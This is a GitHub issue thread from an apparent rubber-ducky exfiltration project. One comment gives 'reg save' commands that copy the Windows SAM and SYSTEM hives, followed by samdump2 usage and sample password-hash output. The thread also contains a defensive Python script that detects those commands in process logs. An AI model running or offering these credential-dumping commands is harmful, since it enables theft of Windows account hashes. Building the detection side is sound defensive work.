balllou / STEG_rubber_ducky

a multi-OS rubber ducky that exfiltrates data hidden with a hidden channel

Windows login/hash dump #5

Closed Nidavelis closed 4 years ago

Nidavelis commented 4 years ago

retrieve login/hash

There is a simpler solution which doesn't need to manage shadow volumes or use external tools. You can simply copy SAM and SYSTEM with the reg command provided by Microsoft (tested on Windows 7 and Windows Server 2008):

reg save hklm\sam c:\sam
reg save hklm\system c:\system

(the last parameter is the location where you want to copy the file)

You can then extract the hashes on a Linux system with the samdump2 package (available on Debian: apt-get install samdump2):

$ samdump2 system sam
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c0e2874fb130015aec4070975e2c6071:::
disabled Guest:501:aad3b435b51404eeaad3b435b51404ee:d0c0896b73e0d1316aeccf93159d7ec0:::
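A defender-side sketch, added here and not part of the original issue or the project's code: it scans process-creation command lines (for example from Windows Security event 4688 or Sysmon event 1, assumed to be exported as host/command-line pairs) for the `reg save` pattern in the comment above and reports hosts where both hives were saved. The host names, sample events and function names are constructed for illustration.

```python
import re
import shlex
from collections import defaultdict

# Root-key spellings reg.exe accepts for HKEY_LOCAL_MACHINE.
ROOTS = {"hklm", "hkey_local_machine"}
# The two hives named in the comment above; both are needed to recover hashes.
HIVES = {"sam", "system"}

def saved_hive(cmdline):
    """Return 'sam' or 'system' if cmdline is `reg save <HKLM hive> <file>`."""
    try:
        # posix=False keeps Windows backslashes intact.
        argv = shlex.split(cmdline, posix=False)
    except ValueError:  # unbalanced quotes: fall back to a plain split
        argv = cmdline.split()
    argv = [a.strip('"') for a in argv]
    if len(argv) < 4:
        return None
    exe = re.split(r"[\\/]", argv[0])[-1].lower()
    if exe not in ("reg", "reg.exe") or argv[1].lower() != "save":
        return None
    root, _, sub = argv[2].lower().partition("\\")
    sub = sub.rstrip("\\")
    # Only the whole hive counts; HKLM\SYSTEM\<subkey> saves are ignored.
    return sub if root in ROOTS and sub in HIVES else None

def hosts_with_both_hives(events):
    """events: iterable of (host, cmdline). Map host -> matching command
    lines, for hosts where both SAM and SYSTEM were saved."""
    seen, hits = defaultdict(set), defaultdict(list)
    for host, cmd in events:
        hive = saved_hive(cmd)
        if hive:
            seen[host].add(hive)
            hits[host].append(cmd)
    return {h: hits[h] for h in seen if seen[h] == HIVES}

# Constructed sample events (hypothetical hosts), not real log data.
SAMPLE_EVENTS = [
    ("WS-014", r"reg save hklm\sam c:\sam"),
    ("WS-014", r"reg save hklm\system c:\system"),
    ("WS-022", r'"C:\Windows\System32\reg.exe" SAVE HKEY_LOCAL_MACHINE\SAM "C:\Users\Public\s 1"'),
    ("WS-022", r"reg query HKLM\SYSTEM\CurrentControlSet\Services"),
    ("SRV-03", r"reg save HKLM\SOFTWARE\Contoso c:\backup\contoso.hiv"),
]

if __name__ == "__main__":
    for host, cmds in hosts_with_both_hives(SAMPLE_EVENTS).items():
        print(host, cmds)
```

A single-hive match from `saved_hive` (as on the constructed host WS-022) is still worth reviewing on its own; the pairing check only raises confidence.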

balllou commented 4 years ago

The issue already exists -> info collection; I'm moving this into that issue and closing.